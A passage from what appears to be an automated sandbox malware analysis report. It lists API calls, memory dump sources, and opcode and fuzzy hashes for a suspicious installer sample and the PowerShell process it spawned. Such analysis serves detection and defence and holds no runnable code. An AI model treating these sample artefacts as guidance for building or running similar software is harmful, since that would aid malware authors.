                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                  • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                  • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                  • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 004052C5
                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                    • Part of subcall function 0040427D: SendMessageW.USER32(0002046A,00000000,00000000,00000000), ref: 0040428F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                  • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                  • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                  • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Space available: ,?,?,004063FC,80000002), ref: 004061CE
                                  • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Space available: ,Space available: ,Space available: ,00000000,Completed), ref: 004061D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID: Space available:
                                  • API String ID: 3356406503-2890305591
                                  • Opcode ID: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                  • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                  • Opcode Fuzzy Hash: 39fcf064542560d24c6d229e41b3d785baee5d61bfb3b66db71ff6e5a1171cc9
                                  • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                  APIs
                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,753B3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                  • GlobalFree.KERNEL32(00000000), ref: 00403936
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-3355392842
                                  • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                  • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                  • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                  • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                  APIs
                                  • lstrlenW.KERNEL32(00442800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                  • CharPrevW.USER32(00442800,00000000,00442800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-3370423016
                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                  • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                  • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                  • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                  • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                  • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3050000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: adaef0ba9ab9cfab0362a3676198e9ea77c2741f951adbb7e9925b98952bd41a
                                  • Instruction ID: 71cd0c40f07861f38825da514e36f97d7eb4395438367971a5610f8563a02649
                                  • Opcode Fuzzy Hash: adaef0ba9ab9cfab0362a3676198e9ea77c2741f951adbb7e9925b98952bd41a
                                  • Instruction Fuzzy Hash: 8F915B71A016195BDB19EFA4C8015AFB7E7EF84700B01892DD516BB350EF389E0A8FE5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3050000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c898e2feba0900f01c23e69f237f5bbc9be010a36ffa61d2a33cdc55661d98b3
                                  • Instruction ID: 3e695ef02aa8339d77014e30a496ef9f0eefeba1613e510d915979e464ec91f9
                                  • Opcode Fuzzy Hash: c898e2feba0900f01c23e69f237f5bbc9be010a36ffa61d2a33cdc55661d98b3
                                  • Instruction Fuzzy Hash: 40916B71A016195BDF19EFA4C8015AFB6E7EF84700B01892DD516BB350EF389E068FE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3050000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: c5o^$s5o^
                                  • API String ID: 0-1481292207
                                  • Opcode ID: 5dea7c2da712c0965deff0724c65a7add7f9726acfbecbc192c76b67e4e93e71
                                  • Instruction ID: 783475a614e3a7f9945a5b9bca6881163484dd6bf944163a4a59fb892b578fe0
                                  • Opcode Fuzzy Hash: 5dea7c2da712c0965deff0724c65a7add7f9726acfbecbc192c76b67e4e93e71
                                  • Instruction Fuzzy Hash: DF1151302022069FC716EB38C44456ABBA2FF873547148A7EE44ACB711DB76E807CF92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3050000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: c5o^$s5o^
                                  • API String ID: 0-1481292207
                                  • Opcode ID: a67cfaee10b0520b2995d2e711c8be04c7f006c8195422a456edf17286829133
                                  • Instruction ID: 95e0c647af45fe685c400c5a48eaa8296e62ab67158088e8a89ec7beb2e66444
                                  • Opcode Fuzzy Hash: a67cfaee10b0520b2995d2e711c8be04c7f006c8195422a456edf17286829133
                                  • Instruction Fuzzy Hash: 63016D3020120A9BCB15EB38C40466AB7A3FFCA3547548A3DE40A8B710DB76F807CF91
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e109acd91f3770c8d85b5634ec9dad78195ed00b659390d0ef0227acc29fd4ea
                                  • Instruction ID: a06fd3b774be9fbab3526afe821b85f56ad37ef46b2b8c9248a99b0fa61e816c
                                  • Opcode Fuzzy Hash: e109acd91f3770c8d85b5634ec9dad78195ed00b659390d0ef0227acc29fd4ea
                                  • Instruction Fuzzy Hash: 2AE291B4A01214DFEB24CF24C854BEAB7B6EF85308F1088A9D91A6B754DB35ED81CF51
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5a6343e61697b66f155c97984ca126b6c426f06089e349b4202df80e5af6d8f
                                  • Instruction ID: 094705f5584f154104110a5608945965c937d6b24163f9bd184b0d11f5154529
                                  • Opcode Fuzzy Hash: d5a6343e61697b66f155c97984ca126b6c426f06089e349b4202df80e5af6d8f
                                  • Instruction Fuzzy Hash: 2AA2A2B4E11204DFDB24CB68C584BA9B7B2EF84708F208469D916AF756CB76EC81CF51
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ea2c23581f270341b043364775e7933a3ea4dedd030265503eaec29faafc9e4
                                  • Instruction ID: 9c6960f493ca26f360878b9212cad50e3a737a6e15010e6e893a9892c08dc3a3
                                  • Opcode Fuzzy Hash: 7ea2c23581f270341b043364775e7933a3ea4dedd030265503eaec29faafc9e4
                                  • Instruction Fuzzy Hash: A282B0B0E01254DFD724CF64C850BAABBB2EF85704F10C8AAD55A6B744DB71AD82CF91
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2f3c3483e4efe4e2f6bb03d7af85180ea7fa2c65448362a6128127401092903
                                  • Instruction ID: 14583af7a4c526eea1fa17ca9673b3855e5955fdefd2bda6ea142d8f01543b07
                                  • Opcode Fuzzy Hash: b2f3c3483e4efe4e2f6bb03d7af85180ea7fa2c65448362a6128127401092903
                                  • Instruction Fuzzy Hash: 7182C4B4E11204DFEB24CB68C984B99B7B2EF84708F208469E9166F752C776EC81CF51
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ef6b88b3a2efada28446a9a67fd59f1125041cb40422b34cce79d04cba58a04
                                  • Instruction ID: 1262615f83f5497e201434b38b30bf1b807dc99d39e157d6d99ba2e4fede7536
                                  • Opcode Fuzzy Hash: 3ef6b88b3a2efada28446a9a67fd59f1125041cb40422b34cce79d04cba58a04
                                  • Instruction Fuzzy Hash: 918293B0A01254DFD724CF64C840BAABBB2EF85708F10C9AAD55B6B744CB75AD81CF91
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f845acbdbe0d9f0f605815aad7eb40757e3d4a28ef47df6c7ca2105975cc118c
                                  • Instruction ID: b83c65b3640c6d4a39b4784cc82d880cb021d41c2edd2f2b7bce515c869191be
                                  • Opcode Fuzzy Hash: f845acbdbe0d9f0f605815aad7eb40757e3d4a28ef47df6c7ca2105975cc118c
                                  • Instruction Fuzzy Hash: 3982A474B01214DFE724DB24C884BAAB7F2EF85308F1089A9D91A6B754DB35ED81CF91
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d4a5c53adc97e6f3e8cc7071ff10105c1fbdbbbebccccc7931660d16ac7adb12
                                  • Instruction ID: ec0437263d8c79263460b7de708f9c9597a43b0144b6983edd844fc7c74011b4
                                  • Opcode Fuzzy Hash: d4a5c53adc97e6f3e8cc7071ff10105c1fbdbbbebccccc7931660d16ac7adb12
                                  • Instruction Fuzzy Hash: A672A1B0E01255DFD724CF64C840BAABBB2EF85708F10C8AAD55A6B754CB35AD81CF91
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274416039605.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8fc0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1a85332516a1f4db4d59b52b4e1043d7c49aa4a4538e37947f90409e1272185
                                  • Instruction ID: 72ce48e2656acd2fa1bfffb421d01aa91ae0acf77877de554e9ba4905b3113ea
                                  • Opcode Fuzzy Hash: f1a85332516a1f4db4d59b52b4e1043d7c49aa4a4538e37947f90409e1272185
                                  • Instruction Fuzzy Hash: DF32F475F00206DFDB14CB78C550AAABBB2AF85212F14C06ED8459F356DB32DE92CB91
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f6ef4d1050cf017a1472dfc7060ae4fca21353407ab064c2b1b64379b5922ea
                                  • Instruction ID: 288db9ec49f1fc7b313b3a032ab6ca3e7da533fbf87970498b181c9257014efb
                                  • Opcode Fuzzy Hash: 2f6ef4d1050cf017a1472dfc7060ae4fca21353407ab064c2b1b64379b5922ea
                                  • Instruction Fuzzy Hash: 565293B0A01254DFD724CF64C840BAABBB2EF85708F50C8AAD55A6B744CB75AD81CF91
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 394960007319493e4c091f17b5891b3f7dc3f19a4b0c918ae98a3d27f078925e
                                  • Instruction ID: 1a2aa103459bb53483c5cffd3bd66c775e2a60dd4cc7ae3b43fceb08d6c95dd0
                                  • Opcode Fuzzy Hash: 394960007319493e4c091f17b5891b3f7dc3f19a4b0c918ae98a3d27f078925e
                                  • Instruction Fuzzy Hash: 4F429174B01214DFE724DB64C884BEAB7B2EF85308F1089A9D91A6B744DB35ED81CF91
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d99ee35d2af4494c79d1a6efc3f1973e367c9a4cd0999ea25aa7e6ded45b337d
                                  • Instruction ID: 78e0f8c119064d89897d1dab823c2f64d60749a7ce894ba5f4d70cca7889ad0d
                                  • Opcode Fuzzy Hash: d99ee35d2af4494c79d1a6efc3f1973e367c9a4cd0999ea25aa7e6ded45b337d
                                  • Instruction Fuzzy Hash: 1432C2B4B02208DFD718CBA8C444B9ABBB6EF86714F24C069E5169F355D772EC42CB61
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cdbd8ebf5517dcaa5850a95a767d25e1328bea359b44effb869adad33974874
                                  • Instruction ID: 9777882a92394231ea577b45fa452e9954650f738cfd288b31364cc2a13138c1
                                  • Opcode Fuzzy Hash: 8cdbd8ebf5517dcaa5850a95a767d25e1328bea359b44effb869adad33974874
                                  • Instruction Fuzzy Hash: 0E125FB0A01215DFEB24CB24C844BAAB7B6FF45704F0084E9D51AAB794DB36ED85CF61
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
